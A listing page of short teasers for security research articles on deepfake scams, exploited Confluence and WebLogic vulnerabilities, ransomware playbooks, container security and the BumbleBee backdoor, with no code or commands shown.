How Underground Groups Use Stolen Identities and Deepfakes

How Underground Groups Use Stolen Identities and Deepfakes

These deepfake videos are already being used to cause problems for public figures. Celebrities, high-ranking government officials, well-known corporate figures, and other people who have many high-resolution images and videos online are the most easily targeted. We see that social engineering scams using their faces and voices are already being proliferated.  Given the tools and available deepfake technology, we can expect to see even more attacks and scams aimed at manipulating victims through voice and…

Read More

Atlassian Confluence Vulnerability CVE-2022-26134 Abused For Cryptocurrency Mining, Other Malware

Atlassian Confluence Vulnerability CVE-2022-26134 Abused For Cryptocurrency Mining, Other Malware

Atlassian Confluence Vulnerability CVE-2022-26134 Abused For Cryptocurrency Mining, Other Malware Exploits & Vulnerabilities Users are advised to patch immediately: We found exploit samples abusing the Atlassian Confluence vulnerability (CVE-2022-26134) in the wild for malicious cryptocurrency mining. By: Sunil Bharti September 21, 2022 Read time:  ( words) We observed the active exploitation of CVE-2022-26134, an unauthenticated remote code execution (RCE) vulnerability with a critical rating of 9.8 in the collaboration tool Atlassian Confluence. The gap is…

Read More

Security Risks in Logistics APIs Used by E-Commerce Platforms

Security Risks in Logistics APIs Used by E-Commerce Platforms

Security Risks in Logistics APIs Used by E-Commerce Platforms Our research examines the security flaws that we found in the logistics API implementation of e-commerce platforms that can potentially expose the consumers’ personal information. We discuss the security risks that such flaws present for software engineers, e-commerce platform providers, and consumers. By: Ryan Flores, Charles Perine, Lord Alfred Remorin, Roel Reyes September 20, 2022 Read time:  ( words) The connectivity that we’ve experienced of late…

Read More

The Risk of Ransomware Supply Chain Attacks

The Risk of Ransomware Supply Chain Attacks

Ransomware has been a major threat to cybersecurity throughout the years, dominating boardroom discussions. It is a type of malware that prevents or limits users from accessing their systems. Malicious actors lock the system’s screen or user files until a hefty ransom is paid. First seen in Russia between 2005 and 2006, ransomware’s popularity as a business model spread across the globe. By 2012, Trend Micro has observed a continuous spread of infections across Europe…

Read More

A Post-exploitation Look at Coinminers Abusing WebLogic Vulnerabilities

A Post-exploitation Look at Coinminers Abusing WebLogic Vulnerabilities

Using Workload Security to detect WebLogic vulnerability exploitation Workload Security’s correlation of telemetry and detections provided the initial security context in this campaign, which allowed security teams and analysts to track and monitor the malicious actor’s activities. The following Workload Security modules worked to detect the exploitation of CVE-2020-14882 on vulnerable systems: Intrusion prevention system module Workload Security’s intrusion prevention system module can tap into incoming traffic and effectively block and detect malicious network traffic….

Read More

Security Breaks: TeamTNT’s DockerHub Credentials Leak

Security Breaks: TeamTNT’s DockerHub Credentials Leak

We constantly deploy and study our honeypots to get a view of actively exploited vulnerabilities and misconfigurations on platforms and services that pose cloud security risks. One of these honeypots is based on exposed Docker REST API for analysis from cloud services providers’ and users’ perspectives. Upon analyzing the samples, we realized and were able to understand the threat actors’ use of container registry features for Docker malware and tactics, techniques, and procedures (TTPs). Our…

Read More

How Malicious Actors Abuse Native Linux Tools in Their Attacks

How Malicious Actors Abuse Native Linux Tools in Their Attacks

Based on real-world attacks and our honeypots, we observed that malicious actors use a variety of enabled tools that come bundled with Linux distributions, such as curl, wget, chmod, chattr, ssh, base64, chroot, crontab, ps, and pkill, that are abused by attackers for nefarious purposes. We have seen malicious actors abusing these tools in the wild. The presence of these utilities, especially inside container environments, should be at least considered, since they provide additional avenues…

Read More

Enhancing Cloud Security by Reducing Container Images Through Distroless Techniques

Enhancing Cloud Security by Reducing Container Images Through Distroless Techniques

Figure 1 shows that there are 96 packages installed in this image. We can also use Grype, also an increasingly popular tool, to analyze the SBOM generated by Syft to scan the original image for vulnerabilities. The extent of the risk of using Debian-based images is plain to see: The more packages there are, the larger the attack surface becomes. This also results in a bigger disk and bandwidth footprint, which has pushed many developers…

Read More

Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa

Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa

Initial Access Play’s ransomware actors commonly gain initial access through valid accounts that have been reused across multiple platforms, have previously been exposed, or were obtained through illegal means. This includes Virtual Private Network (VPN) accounts, not just domain and local accounts. Exposed RDP servers are also abused to establish a foothold. Another technique Play ransomware uses is the exploitation of the FortiOS vulnerabilities CVE-2018-13379 and CVE-2020-12812. CVE-2018-13379 is a path traversal vulnerability in the…

Read More

BumbleBee a New Modular Backdoor Evolved From BookWorm

BumbleBee a New Modular Backdoor Evolved From BookWorm

BumbleBee a New Modular Backdoor Evolved From BookWorm Malware In March 2021, we investigated a backdoor with a unique modular architecture and called it BumbleBee due to a string embedded in the malware. However, in our recent investigations, we have discovered a controller application that expands its capabilities. By: Vickie Su, Ted Lee, Nick Dai September 02, 2022 Read time:  ( words) In March 2021, we investigated a backdoor with a unique modular architecture and…

Read More
1 9 10 11 12 13 27